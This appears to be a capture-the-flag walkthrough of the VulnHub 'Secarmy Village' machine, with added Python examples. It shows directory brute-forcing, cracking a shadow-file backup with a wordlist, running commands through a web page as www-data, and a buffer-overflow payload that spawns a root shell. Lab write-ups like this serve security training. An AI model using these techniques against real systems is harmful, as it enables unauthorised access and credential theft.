
This is a box created for the Secarmy 2020 CTF during GrayHat. It contains 10 challenges covering different topics, from pentesting to crypto and pwn. The machine can be found on VulnHub.
Enumeration
Running nmap we find 4 ports open:
root@kali:~# nmap -p- -T5 192.168.1.41
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-30 17:41 CET
Nmap scan report for 192.168.1.41
Host is up (0.000093s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
1337/tcp open waste
MAC Address: 08:00:27:6C:A7:B6 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 11.05 seconds
UNO
Going to port 80 we find the following landing page
Then running gobuster we find a hidden directory, /anon:
root@kali:~# gobuster dir -u http://192.168.1.41/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/javascript (Status: 301)
/anon (Status: 301)
/server-status (Status: 403)
Inspecting its source code we find user uno's credentials:
<html>
<head>
<title>Totally Secret Directory</title>
</head>
<body>
<center><b style="font-size: 32px;">Welcome to the hidden directory! <br>
<br>
Here are your credentials to make your way into the machine!
<br>
<br>
<font color="white">uno:luc10r4m0n</font>
</b></center>
</body>
</html>
After logging in through ssh we find a file containing the credentials for user dos:
uno@svos:~$ cat readme.txt
Head over to the second user!
You surely can guess the username , the password will be:
4b3l4rd0fru705
DOS
Now that we have switched to dos we find a readme:
dos@svos:~$ cat readme.txt
You are required to find the following string inside the files folder:
a8211ac1853a1235d48829414626512a
So we can read all the files and grep for that string, also showing a few lines above and below it:
dos@svos:~/files$ cat * | grep -B 10 -A 10 a8211ac1853a1235d48829414626512a
From it we get:
Look inside file3131.txt
Going to that file we find a string which seems to be base64 encoded.
Then going to CyberChef we see it was a zip file and we can get the files contained inside it.
From todo.txt we get the following:
Although its total WASTE but... here's your super secret token: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b
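The CyberChef step done in code, as an added example that is not part of the original writeup: base64-decode the blob, recognise the zip container from its leading magic bytes, and pull todo.txt out in memory. The base64 string from file3131.txt is not reproduced on the page, so the sample below is constructed here (a zip holding the todo.txt text shown above).

```python
import base64
import io
import zipfile

# Leading magic bytes of containers commonly met in CTF blobs
MAGIC = {
    b"PK\x03\x04": "zip",
    b"\x1f\x8b": "gzip",
    b"\x7fELF": "elf",
    b"\x89PNG": "png",
}

def identify_blob(b64_text):
    """Base64-decode a (possibly line-wrapped) blob and name its type from the magic bytes."""
    raw = base64.b64decode("".join(b64_text.split()))
    for magic, name in MAGIC.items():
        if raw.startswith(magic):
            return name, raw
    return "unknown", raw

def extract_zip_text(raw):
    """Return {member name: text} for every member of an in-memory zip."""
    with zipfile.ZipFile(io.BytesIO(raw)) as zf:
        return {name: zf.read(name).decode() for name in zf.namelist()}

def solve(b64_text):
    """Decode, check that it really is a zip, and hand back the contained text files."""
    kind, raw = identify_blob(b64_text)
    if kind != "zip":
        raise ValueError("expected a zip archive, got " + kind)
    return extract_zip_text(raw)

def _constructed_sample():
    """Constructed stand-in for the blob in file3131.txt: a zip holding todo.txt."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("todo.txt", "Although its total WASTE but... here's your super secret token: "
                    "c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b\n")
    return base64.b64encode(buf.getvalue()).decode()

# A base64 zip always starts with "UEsDB" (the encoding of PK\x03\x04), a quick eyeball check
SAMPLE_B64 = _constructed_sample()
```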
TRES
When connecting to port 1337 we are asked for a token, so we can use the one obtained from the previous file:
root@kali:~# nc 192.168.1.40 1337
Welcome to SVOS Password Recovery Facility!
Enter the super secret token to proceed: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b
And we obtain user tres's credentials:
Here's your login credentials for the third user tres:r4f43l71n4j3r0
CUATRO
We find a txt file inside tres's home directory which tells us to reverse a Linux binary:
tres@svos:~$ cat readme.txt
A collection of conditionals has been added in the secarmy-village binary present in this folder reverse it and get the fourth user's credentials , if you have any issues with accessing the file you can head over to: https://mega.nz/file/XodTiCJD#YoLtnkxzRe_BInpX6twDn_LFQaQVnjQufFj3Hn1iEyU
Trying to run the binary we obtain an error:
tres@svos:~$ ./secarmy-village
./secarmy-village: error while loading shared libraries: libgo.so.16: cannot open shared object file: No such file or directory
So we can use strings to read some data from it, and among its output we can retrieve cuatro's password:
tres@svos:~$ strings secarmy-village
p3dr00l1v4r3z
CINCO
In cuatro's home directory we find a file telling us to check /justanothergallery:
cuatro@svos:~$ cat todo.txt
We have just created a new web page for our upcoming platform, its a photo gallery. You can check them out at /justanothergallery on the webserver.
Going to the website we find the following landing page
Then using gobuster we find a /qr directory containing all the QR codes:
root@kali:~# gobuster dir -u http://192.168.1.41/justanothergallery/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/qr (Status: 301)
So we can bulk download these QR codes using wget:
root@kali:~# wget -r --no-parent http://192.168.1.41/justanothergallery/qr/
root@kali:~/192.168.1.41/justanothergallery/qr# ls
image-0.png image-17.png image-24.png image-31.png image-39.png image-46.png image-53.png image-60.png image-68.png 'index.html?C=M;O=A'
image-10.png image-18.png image-25.png image-32.png image-3.png image-47.png image-54.png image-61.png image-6.png 'index.html?C=M;O=D'
image-11.png image-19.png image-26.png image-33.png image-40.png image-48.png image-55.png image-62.png image-7.png 'index.html?C=N;O=A'
image-12.png image-1.png image-27.png image-34.png image-41.png image-49.png image-56.png image-63.png image-8.png 'index.html?C=N;O=D'
image-13.png image-20.png image-28.png image-35.png image-42.png image-4.png image-57.png image-64.png image-9.png 'index.html?C=S;O=A'
image-14.png image-21.png image-29.png image-36.png image-43.png image-50.png image-58.png image-65.png index.html 'index.html?C=S;O=D'
image-15.png image-22.png image-2.png image-37.png image-44.png image-51.png image-59.png image-66.png 'index.html?C=D;O=A'
image-16.png image-23.png image-30.png image-38.png image-45.png image-52.png image-5.png image-67.png 'index.html?C=D;O=D'
Then we can read the QR codes with zbar and a simple bash script to automate it:
#!/bin/bash
# Decode every PNG in the current directory; -q prints only the decoded data
for i in *.png
do
  zbarimg -q "$i" 2>/dev/null
done
From the output we get user cinco's credentials:
QR-Code:the
QR-Code:credentials
QR-Code:for
QR-Code:solving
QR-Code:the
QR-Code:5th
QR-Code:user:
QR-Code:cinco:ruy70m35
SEIS
As usual we find another hint, this time telling us to look for another directory:
cinco@svos:~$ cat readme.txt
Check for Cinco's secret place somewhere outside the house
So in the root directory we find a directory called cincos-secrets:
cinco@svos:/cincos-secrets$ ls -la
total 16
dr-xr-xr-x 2 cinco root 4096 Oct 9 18:07 .
drwxr-xr-x 25 root root 4096 Oct 18 14:42 ..
-rw-r--r-- 1 cinco root 31 Oct 9 18:07 hint.txt
--w------- 1 cinco root 1876 Sep 27 15:46 shadow.bak
There we have a backup of the shadow file and a hint which references the rockyou wordlist:
cinco@svos:/cincos-secrets$ cat hint.txt
we will, we will, ROCKYOU..!!!
Now it can be easily cracked using John the Ripper, obtaining Hogwarts as the password:
root@kali:~# john shadow --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Hogwarts (seis)
SIETE
In this case we are asked to visit /shellcmsdashboard:
seis@svos:~$ cat readme.txt
head over to /shellcmsdashboard webpage and find the credentials!
Going to the website we find this login page
We can easily find the credentials in a comment in the robots.txt file:
# Username: admin Password: qwerty
After logging in we are asked to visit /aabbzzee.php.
There we can execute commands as www-data. Running ls -la we find an interesting file, readme9213.txt, without read permissions.
But as it is owned by www-data we can change its permissions and read it, obtaining the next user's password.
OCHO
Now inside siete's home we find a bunch of files and a password-protected zip file:
siete@svos:~$ ls
flag7.txt hint.txt key.txt message.txt mighthelp.go password.zip
The contents of the txt files are the following:
siete@svos:~$ cat hint.txt
Base 10 and Base 256 result in Base 256!
siete@svos:~$ cat key.txt
x
siete@svos:~$ cat message.txt
[11 29 27 25 10 21 1 0 23 10 17 12 13 8]
So it is a crypto challenge where we have a set of numbers and an ASCII key, and we are looking for ASCII output, so it looks like XOR.
Going to https://www.dcode.fr/xor-cipher we insert the numbers to be decoded and 'x' as the decryption key and obtain the password of the zip file.
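The XOR step done by hand instead of on dcode, as an added example that is not part of the original writeup. It parses the base-10 list from message.txt into bytes (the hint's "base 256"), XORs with the key from key.txt, and also generalises to recovering a single-byte key by ranking all 256 candidates when key.txt is not available. MESSAGE_TXT and KEY_TXT are the page's file contents typed in here.

```python
import re
import string

# Contents of message.txt and key.txt as shown on the page
MESSAGE_TXT = "[11 29 27 25 10 21 1 0 23 10 17 12 13 8]"
KEY_TXT = "x"

def parse_message(text):
    """Turn the '[n n n ...]' base-10 list into bytes; each number must fit one byte."""
    nums = [int(n) for n in re.findall(r"\d+", text)]
    if any(n > 255 for n in nums):
        raise ValueError("every value must fit in one byte (base 256)")
    return bytes(nums)

def xor_with_key(data, key):
    """XOR data against a repeating ASCII key (XOR is its own inverse)."""
    key = key.encode() if isinstance(key, str) else key
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def decrypt_message(message_txt=MESSAGE_TXT, key_txt=KEY_TXT):
    """The page's step: XOR the numbers with 'x' to get the zip password."""
    return xor_with_key(parse_message(message_txt), key_txt.strip()).decode("ascii")

def recover_single_byte_key(data):
    """When the key is unknown: try all 256 single-byte keys and rank them by how
    much lowercase text they produce. Returns (key, plaintext) pairs, best first;
    a wrong key turns most bytes into non-letters, so it scores low."""
    scored = []
    for k in range(256):
        out = bytes(b ^ k for b in data)
        score = sum(1 for c in out if chr(c) in string.ascii_lowercase + " ")
        scored.append((score, k, out))
    scored.sort(key=lambda t: t[0], reverse=True)
    return [(chr(k), out.decode("latin-1")) for _, k, out in scored]
```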
From the zip file we obtain user ocho's credentials:
siete@svos:~$ unzip password.zip
Archive: password.zip
[password.zip] password.txt password:
extracting: password.txt
siete@svos:~$ cat password.txt
the next user's password is m0d3570v1ll454n4
NUEVE
Now we find a packet capture file:
ocho@svos:~$ ls
flag8.txt keyboard.pcapng
We will transfer it to our machine with scp to analyse it with Wireshark:
scp ocho@192.168.1.35:/home/ocho/keyboard.pcapng keyboard.pcapng
Following the HTTP stream of the GET /none.txt request we get a bunch of text, but in the middle of it we can find an encrypted message.
Taking into account the context of the challenge it seems like a keyboard shift cipher, so we can go to https://www.dcode.fr/keyboard-shift-cipher to decode it.
There we obtain user nueve's credentials.
ROOT
This is the final challenge, where we need to root the machine. Inside nueve's home we find a binary and a funny readme:
nueve@svos:~$ ls
flag9.txt orangutan readme.txt
nueve@svos:~$ cat readme.txt
,╓╓╖╗╗╗╗╖╖╓,
,╓╗╬╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓@╗,
╓@▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫@╖
,╗▓╫╫╫▓▀▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╬╣╫╫╫╫@,
,#╫╫╫▓▓░░░░╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫Ñ░░░╣▓╫╫╫▌µ
,╗▓╫╫╫╫▓▀░░░░░░╩╫╫Ñ╫╫╫╫╫╫╫╫░╫╫Ñ░░░░░░╠▓▓╫╫╫╫@µ
╓╬╫╫╫╫╫╫▓▌░░░░░╩"`` ╙╫╫╫╫M ``"╨╦░░░░╠▓▓╫╫╫╫╫▓╗
╓╣╫╫╫╫╫╫╫▓▓░░░░╩ ,╦NÑÑNÑ░╫╫Ñ░NÑÑN╦╥ ╙░░░░╟▓▓╫╫╫╫╫╫╫W
,╬╫╫╫╫╫╫╫╫▓▓▌░░░╨ ╦░░░▄▓▓▄░░░░╠▓▓▓▄░░Ñ 1░░░░▓▓╫╫╫╫╫╫╫╫▓µ
╔╫╫╫╫╫╫╫╫╫╫▓▓▒░░░░╦N░░░╙████░░░░║███▌░░░╦╦N░░░░▓▓╫╫╫╫╫╫╫╫╫╫@
╬╫╫╫╫╫╫╫╫╫╫╫▓▓M░░░░░░░░░░░╠╠░░░░░░╙╠░░░░░░░░░░░░╣▓▓╫╫╫╫╫╫╫╫╫╫▓
╬╫╫╫╫╫╫╫╫╫╫╫╫▀░░░░░░░░░░░░░░░░╬╫╬╫░░░░░░░░░░░░░░░░╠▓╫╫╫╫╫╫╫╫╫╫╫╫,
╬╫╫╫╫╫╫╫╫╫╫╫▓Ñ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░╣╫╫╫╫╫╫╫╫╫╫╫╫
╟╫╫╫╫╫╫╫╫╫╫╫▓M░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▓▓╫╫╫╫╫╫╫╫╫╫▓
╔╫╫╫╫╫╫╫╫╫╫╫▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░╟▓▓╫╫╫╫╫╫╫╫╫╫▌
╫╫╫╫╫╫╫╫╫╫╫▓▓▌░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░╟▓▓▓╫╫╫╫╫╫╫╫╫╫U
╟╫╫╫╫╫╫╫╫╫╫╫▓▓▓░░░░░░░░░╠▄▄░░░░░░░░░░░░░░░░░░░▄▄░░░░░░░░░╟▓▓▓╫╫╫╫╫╫╫╫╫╫▓
╫╫╫╫╫╫╫╫╫╫╫╣▓▓▓@░░░░░░░░╠███▓▄▄▄░░░░░░░░╠▄▄▄▓██▀░░░░░░░░╠▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫U
╟╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓░░░░░░░░░░╠▀▀████████████▀▀▀░░░░░░░░░░╟▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫▓
▓╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓▓▓▄░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░µ╬▓▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫╫╫U
J╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓▓▓▓▓╬µ░░░░░░░░░░░░░░░░░░░░░░░░µ▄╬▓▓▓▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫@
╟╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓▓▓▓▓▓▓▓@╬▄▄µ░░░░░░░░µµ▄▄╬▓▓▓▓▓▓▓▓▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫
╣╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫
╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫U
╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▌ ╙╫╫╫╫╫╫╫╫M╣╬▀░░░╣▓▓▓▓▓▓▓Ñ░░╠▓M╣▓╫╫╫╫╫╫╫▀ ╙╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫U
]╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╡ ╫╫╫▓╩╠╣M░░░░░░░░╫╫╫╫╫╫Ñ░░░░░░░░╣╠╠╢╫╫╫H J╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╡
]╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╡ ╔░░╠░░░░░░░░░░░░░╢╫╫╫╫╫░░░░░░░░░░░░░Ö░░N J╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▌
╞╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╡ 1░░░░░░░░░░░░░░░░░╫╫╫╫▌░░░░░░░░░░░░░░░░Ñ J╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓
╟╫╫╫╫╫▓╣╣╣╣╣╫╫╫╫╫╡ 1░░░░░░░░░░░░░░░░╣╫╫╫░░░░░░░░░░░░░░░░Ñ J╫╫╫╫╫▓▓╣╣╣▓╫╫╫╫╫╫
╚╣░░░░░░░░░░░░░╠╠╡ 1░░░░░░░░░░░░░░░╟╫╫╫░░░░░░░░░░░░░░░Ñ J╬░░░░░░░░░░░░░░╠╬
1░░░░░░░░░░░░░░░░H 1░░░░░░░░░░░░░░╫M▀╬░░░░░░░░░░░░░░H ░░░░░░░░░░░░░░░░░
╙╨ª "╨╨``╨╨" ╚╨ª 1░░░░░░░░░░░░Ñ 1░░░░░░░░░░░░H "╨╨``╨╨" ╚╨ª ª╨╨`
╙░░░░░░░░░╨` `ªÑ░░░░░░░░H
Can u feeeeeed my orangutan ^^
I executed the file and, as it said it was a pwn challenge, I sent a lot of 'A's to verify it was vulnerable to a buffer overflow:
nueve@svos:~$ ./orangutan
hello pwner
pwnme if u can ;)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
Then I decided to decompile the code using Ghidra.
From the C code we can see that the buffer length is 24, and that if the value of the local_10 variable matches 0xcafebabe it spawns a root shell.
As the machine has python3 installed, I went to my machine and created a simple python2 script to generate the buffer that needs to be passed to the program:
from struct import *
res = 'A' * 24                  # fill the 24-byte buffer
res += pack('<I', 0xcafebabe)   # append 0xcafebabe in little-endian byte order
print(res)
Then I piped the output to a .txt file and uploaded it to the machine through scp.
Finally we pipe the buffer to the program and run another cat to keep reading from stdin and feed it to the /bin/sh spawned by the program, obtaining a root shell:
nueve@svos:~$ (cat bof.txt;cat) | ./orangutan
hello pwner
pwnme if u can ;)
whoami
root
id
uid=0(root) gid=0(root) groups=0(root),1009(nueve)
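As an added example that is not part of the original writeup, a Python 3 version of the payload generator that writes raw bytes (so the python2 detour is unnecessary), plus a hypothetical model of the stack frame described above (24-byte buffer followed by local_10) showing why the offset and the little-endian packing matter. simulate_overflow is an illustration, not the binary's code.

```python
import struct
import sys

BUF_LEN = 24         # size of the char buffer reported by Ghidra (from the writeup)
MAGIC = 0xCAFEBABE   # value local_10 must equal for the binary to spawn the shell

def build_payload(buf_len=BUF_LEN, magic=MAGIC):
    """24 filler bytes to reach local_10, then the magic as a 4-byte little-endian int.
    '<I' pins the byte order explicitly; the page's pack('I') relies on the host's."""
    return b"A" * buf_len + struct.pack("<I", magic)

def simulate_overflow(payload, buf_len=BUF_LEN):
    """Hypothetical model of the frame: a buf_len-byte buffer directly followed by
    the 4-byte local_10 (assumed to start at 0). Returns the value local_10 holds
    after an unchecked copy of the input, i.e. input bytes 25..28 read as an int."""
    frame = bytearray(buf_len + 4)
    n = min(len(payload), len(frame))
    frame[:n] = payload[:n]
    return struct.unpack("<I", bytes(frame[buf_len:]))[0]

if __name__ == "__main__":
    # Python 3 equivalent of the page's python2 print: emit the raw bytes, not str()
    sys.stdout.buffer.write(build_payload() + b"\n")
```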